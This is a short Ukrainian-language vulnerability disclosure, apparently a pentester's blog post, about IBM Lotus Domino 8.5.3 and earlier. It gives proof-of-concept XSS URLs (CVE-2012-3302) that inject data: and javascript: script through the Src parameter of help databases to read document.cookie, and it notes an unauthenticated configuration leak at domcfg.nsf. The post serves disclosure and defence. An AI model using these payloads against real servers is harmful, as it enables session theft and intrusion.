Уразливості в IBM Lotus Domino
23:53 27.08.201215.05.2012
Ще в березні 2008, під час пентесту, я знайшов чимало уразливостей в IBM Lotus Domino. Деякі з них IBM вже виправила, деякі ні, а деякі виправила неякісно.
І у травні, 03.05.2012, під час нового пентесту, я виявив багато уразливостей в IBM Lotus Domino (деякі старі та багато нових), зокрема Cross-Site Scripting та Information Leakage. Це перша порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.
27.08.2012
CVE: CVE-2012-3302
XSS (WASC-08):
Дана XSS в березні 2008 працювала наступним чином:
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//
З тих пір вектор атаки через javascript: URI був виправлений, але існує можливість атаки через data: і vbscript: URI.
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
Information Leakage (WASC-13):
На сторінці https://site/domcfg.nsf, що доступна без аутентифікації, має місце витік інформації про конфігурацію веб сервера. Таку ситуацію я зустрічав на багатьох сайтах на Lotus Domino.
Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили XSS уразливості в версії 8.5.4. Стосовно Information Leakage та інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням.